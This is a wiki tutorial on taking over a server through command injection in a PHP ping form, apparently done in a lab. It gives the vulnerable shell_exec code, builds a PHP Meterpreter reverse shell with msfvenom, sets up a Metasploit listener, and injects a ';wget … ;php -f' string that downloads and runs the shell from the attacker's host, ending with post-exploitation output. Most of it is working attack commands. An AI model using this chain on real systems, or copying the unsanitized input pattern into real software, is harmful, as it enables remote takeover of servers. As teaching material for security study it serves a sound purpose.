From aldeid
Jump to navigation Jump to search



In this tutorial, you will learn how to take over a server that is vulnerable to a command injection vulnerability.


The following tutorial has been tested in following environment:

  • attacker:
    • IP address:
    • Distribution: BackTrack 5 R2
  • target
    • IP address:
    • Distribution: Debian 6



<title>ping host</title>
<form method="GET" action="">
  <input type="text" name="host" />
  <input type="submit" value="ping host" />
if(isset($_GET['host'])) {
  $output = shell_exec("ping -c1 ".$_GET['host']);
  echo "<pre>$output</pre>";

Normal usage

In the normal usage, this application is supposed to output the result of the ping command against a requested host:


This code is vulnerable because it doesn't sanitize user inputs. It is possible to inject other commands:


Create shell with msfvenom

Let's exploit this vulnerability to download a PHP reverse shell. But first create the shell with msfvenom:

root@bt:~# msfvenom -p php/meterpreter/reverse_tcp -f raw lhost= lport=4050 > /var/www/shell.txt
root@bt:~# head /var/www/shell.txt

# The payload handler overwrites this with the correct LHOST before sending
# it to the victim.
$ip = '';
$port = 4050;
$ipf = AF_INET;

if (FALSE !== strpos($ip, ":")) {

As you can see, the first line is commented out. Let's uncomment it:

root@bt:~# sed -i 's/#<?php/<?php/' /var/www/shell.txt

Start web server on attacker's machine

Although it would be possible to host our PHP shell on a third party, it's convenient in our tutorial to host it from the attacker's machine directly. Let's start our web server:

root@bt:~# service apache2 start
 * Starting web server apache2              [ OK ]

Start listening on port 4050 from attacker's machine

From BT5, let's open our listener:

root@bt:~# msfconsole
msf > use multi/handler
msf  exploit(handler) > set payload php/meterpreter/reverse_tcp
msf  exploit(handler) > set lhost
msf  exploit(handler) > set lport 4050
msf  exploit(handler) > exploit

[*] Started reverse handler on 
[*] Starting the payload handler...

Download shell from the vulnerable host

Let's exploit the vulnerability and download our shell from the attacker's web server. Enter following command in the "host" field:

;wget -O /tmp/shell.php;php -f /tmp/shell.php

The above command will download shell.txt as shell.php in the /tmp directory and execute the php shell (php -f /tmp/shell.php)

Test the reverse shell

Now we have a meterpreter:

[*] Sending stage (38791 bytes) to
[*] Meterpreter session 1 opened ( -> at 2012-05-05 21:02:34 -0400

meterpreter > sysinfo
Computer    : snort
OS          : Linux snort 2.6.32-5-686 #1 SMP Mon Jan 16 16:04:25 UTC 2012 i686
Meterpreter : php/php
meterpreter > shell
Process 3845 created.
Channel 0 created.
eth0      Link encap:Ethernet  HWaddr 00:0c:29:97:32:0f  
          inet addr:  Bcast:  Mask:
          inet6 addr: fe80::20c:29ff:fe97:320f/64 Scope:Link
          RX packets:530 errors:0 dropped:0 overruns:0 frame:0
          TX packets:285 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:62923 (61.4 KiB)  TX bytes:31150 (30.4 KiB)
          Interrupt:19 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:0c:29:97:32:19  
          inet addr:  Bcast:  Mask:
          inet6 addr: 2a01:e35:8b15:3430:20c:29ff:fe97:3219/64 Scope:Global
          inet6 addr: fe80::20c:29ff:fe97:3219/64 Scope:Link
          RX packets:9694 errors:0 dropped:0 overruns:0 frame:0
          TX packets:3451 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:2119587 (2.0 MiB)  TX bytes:1297681 (1.2 MiB)
          Interrupt:16 Base address:0x2080 

lo        Link encap:Local Loopback  
          inet addr:  Mask:
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:2597 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2597 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:365075 (356.5 KiB)  TX bytes:365075 (356.5 KiB)